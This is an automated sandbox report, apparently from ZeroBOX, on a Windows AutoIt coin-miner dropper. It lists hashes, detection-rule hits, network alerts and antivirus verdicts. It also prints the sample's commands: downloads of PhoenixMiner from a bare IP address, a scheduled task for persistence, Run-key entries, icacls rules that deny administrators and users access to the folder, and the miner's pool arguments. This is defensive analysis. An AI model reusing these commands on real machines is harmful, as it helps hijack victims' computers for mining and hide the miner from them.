Summary | ZeroBOX

this.exe

Category Machine Started Completed
FILE s1_win7_x6401 March 9, 2021, 12:41 p.m. March 9, 2021, 12:43 p.m.
Size 909.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c49dd8107b3624f824efe4f88cb3f792
SHA256 64bb6aaca4c1ba6b5d4cfe771985587158a453288ef1da1c7cb084b90c3e7cc5
CRC32 B9522724
ssdeep 24576:SAHnh+eWsN3skA4RV1Hom2KXMmHacfmG5:Vh+ZkldoPK8Yacr
Yara
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check
  • AutoIt - www.autoitscript.com/site/autoit/
  • CryptGenKey_Zero - CryptGenKey Zero
  • FindFirstVolume_Zero - FindFirstVolume Zero
  • inject_thread - Code injection with CreateRemoteThread in a remote process
  • network_http - Communications over HTTP
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • keylogger - Run a keylogger
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_files_operation - Affect private profile
  • Str_Win32_Winsock2_Library - Match Winsock 2 API library declaration
  • Str_Win32_Wininet_Library - Match Windows Inet API library declaration
  • Str_Win32_Internet_API - Match Windows Inet API call
  • Str_Win32_Http_API - Match Windows Http API call
  • Process_Snapshot_Kill_Zero - Process Kill Zero
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • Device_Check_Zero - Device Check Zero

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
194.147.115.117 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49199 -> 194.147.115.117:80 2008350 ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile Potential Corporate Privacy Violation
TCP 192.168.56.101:49199 -> 194.147.115.117:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49199 -> 194.147.115.117:80 2019935 ET INFO AutoIt User Agent Executable Request A Network Trojan was detected
TCP 194.147.115.117:80 -> 192.168.56.101:49199 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.147.115.117:80 -> 192.168.56.101:49199 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 194.147.115.117:80 2008350 ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile Potential Corporate Privacy Violation
TCP 192.168.56.101:49203 -> 194.147.115.117:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49203 -> 194.147.115.117:80 2019935 ET INFO AutoIt User Agent Executable Request A Network Trojan was detected
TCP 192.168.56.101:49203 -> 194.147.115.117:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 194.147.115.117:80 -> 192.168.56.101:49203 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.147.115.117:80 -> 192.168.56.101:49203 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 194.147.115.117:80 2008350 ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile Potential Corporate Privacy Violation
TCP 192.168.56.101:49205 -> 194.147.115.117:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49205 -> 194.147.115.117:80 2019935 ET INFO AutoIt User Agent Executable Request A Network Trojan was detected
TCP 192.168.56.101:49205 -> 194.147.115.117:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 194.147.115.117:80 -> 192.168.56.101:49205 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.147.115.117:80 -> 192.168.56.101:49205 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: processed file: C:\ProgramData\NetWork
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\ProgramData\NetWork
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Invalid parameter "Administrators:(R,REA,RA))"
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "SrartupWindows" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\ProgramData\NetWork
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Invalid parameter "Administrators:(R,REA,RA))"
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: processed file: C:\ProgramData\NetWork
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: WARNING: The task name "SrartupWindows" already exists. Do you want to replace it (Y/N)?
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://194.147.115.117/zzztop/PhoenixMiner.exe
suspicious_features Connection to IP address suspicious_request GET http://194.147.115.117/zzztop/This.exe
request GET http://194.147.115.117/zzztop/PhoenixMiner.exe
request GET http://194.147.115.117/zzztop/This.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b62000
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\NetWork\PhoenixMiner.exe
file C:\ProgramData\NetWork\This.exe
cmdline schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
cmdline C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
cmdline C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
cmdline C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
cmdline C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
file C:\ProgramData\NetWork\PhoenixMiner.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\ProgramData\NetWork\PhoenixMiner.exe
parameters: -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
filepath: C:\ProgramData\NetWork\PhoenixMiner.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\ProgramData\NetWork\PhoenixMiner.exe
parameters: -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
filepath: C:\ProgramData\NetWork\PhoenixMiner.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ðDƒJ‘*ÐJ‘*ÐJ‘*Ðþ ÛÐD‘*Ðþ ÙÐñ‘*Ðþ ØÐU‘*ÐÔ1íÐB‘*ÐqÏ)ÑB‘*ÐqÏ.Ña‘*ÐqÏ/Ñʑ*ИÊ/ÑK‘*ÐQ €ÐK‘*ÐCé¹ÐN‘*ÐQ ÐZ‘*Ð$Ì/ÑO‘*ÐÝÏ.Ñe“*ЗnáÐ_‘*ÐJ‘+Ð8*ÐÝÏ/Ñ‘*ÐÝÏ*ÑK‘*ÐØÏÕÐK‘*ÐÝÏ(ÑK‘*ÐRichJ‘*ÐPEd†k›_ð" Ð=Ê;Œ 6@ày`à›p\<œpÜPyà°v0v`y´}`j€j(0#i”à=ðœ”p€.textÌÎ=Ð= `.rdataTÚ2à=Ü2Ô=@@.data´âÀp`°p@À.pdata0v°vxv@@.tls0yˆx@À.gfids<@yŠx@@.rsrcàPyšx@@.reloc´}`y~œx@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $s’’RüÁRüÁRüÁCÁPüÁ̲;ÁSüÁ_@#ÁaüÁ_@ÁãüÁ_@ÁgüÁ[jÁ[üÁ[joÁwüÁRýÁrüÁçŒÁüÁçŒ#ÁSüÁ_@'ÁSüÁRkÁSüÁçŒ"ÁSüÁRichRüÁPEL軩_à"  àR €ð@”@€@@ÌÀ |€ lŽ4qÀ+ PK @ð„.textÝßà `.rdataŽýðþä@@.datatð Râ @À.rsrclŽ€ 4 @@.reloc4qrÄ @B
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00019000', u'virtual_address': u'0x000c8000', u'entropy': 7.307910374133275, u'name': u'.rsrc', u'virtual_size': u'0x00018e6c'} entropy 7.30791037413 description A section with a high entropy has been found
process phoenixminer.exe
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002e0
process_name: rundll32.exe
process_identifier: 2044
0 0

Process32NextW

snapshot_handle: 0x000002d8
process_name: is32bit.exe
process_identifier: 2236
0 0

Process32NextW

snapshot_handle: 0x000002d8
process_name: is32bit.exe
process_identifier: 2236
0 0

Process32NextW

snapshot_handle: 0x000002d8
process_name: is32bit.exe
process_identifier: 2236
0 0

Process32NextW

snapshot_handle: 0x000002d8
process_name: is32bit.exe
process_identifier: 2236
0 0

Process32NextW

snapshot_handle: 0x000002d8
process_name: is32bit.exe
process_identifier: 2236
0 0

Process32NextW

snapshot_handle: 0x000002d8
process_name: is32bit.exe
process_identifier: 2236
0 0
url https://curl.haxx.se/docs/http-cookies.html
url http://www.openssl.org/support/faq.html
url http://crl.comodo.net/TrustedCertificateServices.crl0
url http://users.ocsp.d-trust.net03
url http://crl.ssc.lt/root-b/cacrl.crl0
url http://crl.securetrust.com/STCA.crl0
url http://crl.securetrust.com/SGCA.crl0
url http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url http://www.ssc.lt/cps03
url http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url http://www.pkioverheid.nl/policies/root-policy0
url http://cps.chambersign.org/cps/chambersroot.html0
url http://www.e-szigno.hu/SZSZ/0
url http://www.entrust.net/CRL/Client1.crl0
url http://crl.chambersign.org/publicnotaryroot.crl0
url http://crl.comodo.net/AAACertificateServices.crl0
url http://www.certplus.com/CRL/class3.crl0
url http://logo.verisign.com/vslogo.gif0
url http://www.acabogacia.org/doc0
url http://www.disig.sk/ca/crl/ca_disig.crl0
url https://www.catcert.net/verarrel
url http://www.sk.ee/cps/0
url http://www.quovadis.bm0
url https://www.catcert.net/verarrel05
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url http://crl.chambersign.org/chambersroot.crl0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url http://crl.globalsign.net/root-r2.crl0
url http://certificates.starfieldtech.com/repository/1604
url http://www.d-trust.net0
url http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url http://crl.ssc.lt/root-a/cacrl.crl0
url http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url http://www.certicamara.com/certicamaraca.crl0
url http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url http://www.post.trust.ie/reposit/cps.html0
url http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url http://www2.public-trust.com/crl/ct/ctroot.crl0
url http://www.certicamara.com0
url http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url http://www.comsign.co.il/cps0
url http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalade priviledges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west file rule spreading_file
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
cmdline schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
cmdline C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
host 194.147.115.117
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\NetWork\This.exe
cmdline schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
cmdline C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
cmdline C:\ProgramData\NetWork\PhoenixMiner.exe -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
cmdline "C:\ProgramData\NetWork\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0
url http://194.147.115.117/zzztop/PhoenixMiner.exe
url http://194.147.115.117/zzztop/This.exe
Process injection Process 2648 resumed a thread in remote process 3028
Process injection Process 2092 resumed a thread in remote process 1536
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000424
suspend_count: 1
process_identifier: 3028
1 0 0

NtResumeThread

thread_handle: 0x0000041c
suspend_count: 1
process_identifier: 1536
1 0 0
cmdline icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
cmdline icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
cmdline icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
cmdline C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
cmdline C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
cmdline C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
Bkav W32.AIDetect.malware2
MicroWorld-eScan Trojan.GenericKD.35338298
FireEye Generic.mg.c49dd8107b3624f8
McAfee Artemis!C49DD8107B36
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:Win32/Miner.b6b763bb
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D21B383A
Cyren W32/Trojan.YYEL-5697
Symantec Trojan.Gen.MBT
TrendMicro-HouseCall TROJ_GEN.R057C0PKC20
Avast Win32:Malware-gen
Kaspersky Trojan.Win32.Miner.asymo
BitDefender Trojan.GenericKD.35338298
NANO-Antivirus Trojan.Win32.Miner.ibscgf
Paloalto generic.ml
AegisLab Hacktool.Win32.Gamehack.3!e
Tencent Win32.Trojan.Miner.Syhx
Ad-Aware Trojan.GenericKD.35338298
Sophos Mal/Generic-S
Comodo Malware@#6chz4oapf33y
F-Secure Heuristic.HEUR/AGEN.1100129
DrWeb Trojan.Siggen10.62280
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R057C0PKC20
McAfee-GW-Edition BehavesLike.Win32.TrojanAitInject.dh
Emsisoft Trojan.CoinMiner (A)
APEX Malicious
MaxSecure Trojan.Malware.300983.susgen
Avira HEUR/AGEN.1100129
MAX malware (ai score=100)
Gridinsoft Trojan.Win32.CoinMiner.vb
Microsoft Trojan:Win32/CoinMiner.AC!rfn
ZoneAlarm Trojan.Win32.Miner.asymo
GData Trojan.GenericKD.35338298
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.Generic.C4224711
VBA32 Trojan.Miner
ALYac Trojan.GenericKD.35338298
Malwarebytes Generic.Malware/Suspicious
Ikarus Trojan.Win32.CoinMiner
ESET-NOD32 a variant of Win32/CoinMiner.CFE
eGambit Unsafe.AI_Score_94%
Fortinet AutoIt/Agent.OUJ!tr.dldr
Webroot W32.Trojan.Gen
AVG Win32:Malware-gen
Cybereason malicious.07b362